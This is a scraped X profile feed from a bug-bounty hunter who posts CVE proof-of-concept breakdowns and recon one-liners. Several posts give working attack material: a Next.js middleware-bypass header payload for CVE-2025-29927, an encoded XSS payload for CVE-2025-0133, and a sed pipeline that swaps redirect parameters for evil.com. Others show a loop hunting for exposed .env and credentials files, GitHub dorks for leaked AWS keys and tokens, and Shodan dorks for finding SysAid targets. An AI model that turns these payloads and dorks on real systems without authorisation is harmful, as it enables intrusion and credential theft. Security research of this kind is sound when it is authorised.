h4x0r_fr34k's profile picture. Escape the ordinary! Building: @tcb_securities 🔲 Explorer 🔲 CyberSecurity Enthusiast🔲 YouTuber Click here👇

VAIDIK PANDYA

@h4x0r_fr34k

Escape the ordinary! Building: @tcb_securities 🔲 Explorer 🔲 CyberSecurity Enthusiast🔲 YouTuber Click here👇

CVE-2025-59735 : AndSoft e-TMS v25.03 Command Injection

h4x0r_fr34k's tweet image. CVE-2025-59735 : AndSoft e-TMS v25.03 Command Injection

Upcoming CVE & Bug Bounty POC Breakdowns I’ve been working on detailed breakdowns of some new vulnerabilities: CVE-2025-0133 : XSS CVE-2025-53833 : SSTI CVE-2025-30208 : Local File Inclusion All videos will premiere soon on YouTube. 🔗 Watch here: youtube.com/@linuxbyvikku

h4x0r_fr34k's tweet image. Upcoming CVE & Bug Bounty POC Breakdowns 

I’ve been working on detailed breakdowns of some new vulnerabilities:
CVE-2025-0133 : XSS 
CVE-2025-53833 : SSTI
CVE-2025-30208 : Local File Inclusion

All videos will premiere soon on YouTube.
🔗 Watch here: youtube.com/@linuxbyvikku

VIDEO POC CVE-2025-29927


We need more buddy 🔥

That feeling when your bug bounty finally hits. 🤑 My ramen budget just got a serious upgrade for the month! 💰💸 So grateful for programs that reward security research. 💲💵 #bugbounty #infosec #hacker

maxx_191's tweet image. That feeling when your bug bounty finally hits. 🤑 My ramen budget just got a serious upgrade for the month!
💰💸
So grateful for programs that reward security research. 💲💵
#bugbounty #infosec #hacker


CVE-2025-29927 Exploitation : X-Nextjs-Data: 1 X-Middleware-Subrequest: src/middleware:nowaf:src/middleware:src/middleware:src/middleware:src/middleware:middleware:middleware:nowaf:middleware:middleware:middleware:pages/_middleware

h4x0r_fr34k's tweet image. CVE-2025-29927 

Exploitation :
X-Nextjs-Data: 1
X-Middleware-Subrequest: src/middleware:nowaf:src/middleware:src/middleware:src/middleware:src/middleware:middleware:middleware:nowaf:middleware:middleware:middleware:pages/_middleware
h4x0r_fr34k's tweet image. CVE-2025-29927 

Exploitation :
X-Nextjs-Data: 1
X-Middleware-Subrequest: src/middleware:nowaf:src/middleware:src/middleware:src/middleware:src/middleware:middleware:middleware:nowaf:middleware:middleware:middleware:pages/_middleware
h4x0r_fr34k's tweet image. CVE-2025-29927 

Exploitation :
X-Nextjs-Data: 1
X-Middleware-Subrequest: src/middleware:nowaf:src/middleware:src/middleware:src/middleware:src/middleware:middleware:middleware:nowaf:middleware:middleware:middleware:pages/_middleware

Open Redirects with One-Liners One Liner : cat waybacks.txt | \ sed -E 's#(redirect=|url=|next=|return=|dest=|destination=|continue=|goto=|redirecturl=)[^&]*#\1https://evil.com#gI' | \ httpx -silent -mc 301,302,307,308 -location

h4x0r_fr34k's tweet image. Open Redirects with One-Liners

One Liner : 

cat waybacks.txt | \ 
sed -E 's#(redirect=|url=|next=|return=|dest=|destination=|continue=|goto=|redirecturl=)[^&]*#\1https://evil.com#gI' | \
httpx -silent -mc 301,302,307,308 -location

One liner for finding files subfinder -d domain.com -silent | \ while read host; do \  for path in /config.js /config.json /app/config.js /settings.json /database.json /firebase.json /.env /.env.production /api_keys.json /credentials.json /secrets.json…

h4x0r_fr34k's tweet image. One liner for finding files 

subfinder -d domain.com -silent | \
while read host; do \
 for path in /config.js /config.json /app/config.js /settings.json /database.json /firebase.json /.env /.env.production /api_keys.json /credentials.json /secrets.json…

Check this out 👇Just pushed a new repo to GitHub focused on multiple technologies and panels. If you're doing recon, there's a good chance this helps you: Link : github.com/Vaidik-pandya/… post : 4/100


🔍 GitHub Recon: Complete Guide Here’s a list of dorks you can use: Category 1: Credential & Secret Leakage org:"target" "aws_access_key_id" org:"target" "aws_secret_access_key" org:"target" "Authorization: Bearer" org:"target" "slack_token" path:*.json org:"target"…

h4x0r_fr34k's tweet image. 🔍 GitHub Recon: Complete Guide 
Here’s a list of dorks you can use:

Category 1: Credential & Secret Leakage
org:"target" "aws_access_key_id" 
org:"target" "aws_secret_access_key" 
org:"target" "Authorization: Bearer" 
org:"target" "slack_token" path:*.json 
org:"target"…

Post 2/100 CVE-2025-0133 : Payload + Template Payload: %3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%3E%3Cscript%3Eprompt%28%22XSS%22%29%3C%2Fscript%3E%3C%2Fsvg%3E Write-up: codewithvamp.medium.com/cve-2025-0133-… Template: github.com/projectdiscove… ---- Check About…

h4x0r_fr34k's tweet image. Post 2/100
CVE-2025-0133 : Payload + Template

Payload: %3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%3E%3Cscript%3Eprompt%28%22XSS%22%29%3C%2Fscript%3E%3C%2Fsvg%3E

Write-up: codewithvamp.medium.com/cve-2025-0133-…

Template: github.com/projectdiscove…

---- 
Check About…
h4x0r_fr34k's tweet image. Post 2/100
CVE-2025-0133 : Payload + Template

Payload: %3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%3E%3Cscript%3Eprompt%28%22XSS%22%29%3C%2Fscript%3E%3C%2Fsvg%3E

Write-up: codewithvamp.medium.com/cve-2025-0133-…

Template: github.com/projectdiscove…

---- 
Check About…
h4x0r_fr34k's tweet image. Post 2/100
CVE-2025-0133 : Payload + Template

Payload: %3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%3E%3Cscript%3Eprompt%28%22XSS%22%29%3C%2Fscript%3E%3C%2Fsvg%3E

Write-up: codewithvamp.medium.com/cve-2025-0133-…

Template: github.com/projectdiscove…

---- 
Check About…
h4x0r_fr34k's tweet image. Post 2/100
CVE-2025-0133 : Payload + Template

Payload: %3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%3E%3Cscript%3Eprompt%28%22XSS%22%29%3C%2Fscript%3E%3C%2Fsvg%3E

Write-up: codewithvamp.medium.com/cve-2025-0133-…

Template: github.com/projectdiscove…

---- 
Check About…

Post 1/100 CVE-2025-2775 : Discovery + Exploitation + Template Shodan Dork : http.title:"SysAid" Fofa Dork : title="SysAid" || body="SysAid Technologies" Exploit: github.com/watchtowrlabs/… Template : drive.google.com/file/d/1ZG1rFR… ---- Check it Out : shorturl.at/9aGVF

h4x0r_fr34k's tweet image. Post 1/100 
CVE-2025-2775 : Discovery + Exploitation + Template 

Shodan Dork : http.title:"SysAid" 
Fofa Dork : title="SysAid" || body="SysAid Technologies" 

Exploit: github.com/watchtowrlabs/…

Template : drive.google.com/file/d/1ZG1rFR…

----
Check it Out : shorturl.at/9aGVF

Alright, I’ve been off the grid for a while... but I’m back. Will be posting again over X


Nothing fancy. Just focused learning. Sometimes all someone needs is structure. Not a magic tool. Just a clearer path. That’s what these sessions aim to offer — a space to explore real-world bugs, build tools, and understand the "Why" behind each step. This is how the session…

h4x0r_fr34k's tweet image. Nothing fancy. Just focused learning.

Sometimes all someone needs is structure.
Not a magic tool. Just a clearer path.

That’s what these sessions aim to offer — a space to explore real-world bugs, build tools, and understand the "Why" behind each step.

This is how the session…

Loading...

Something went wrong.


Something went wrong.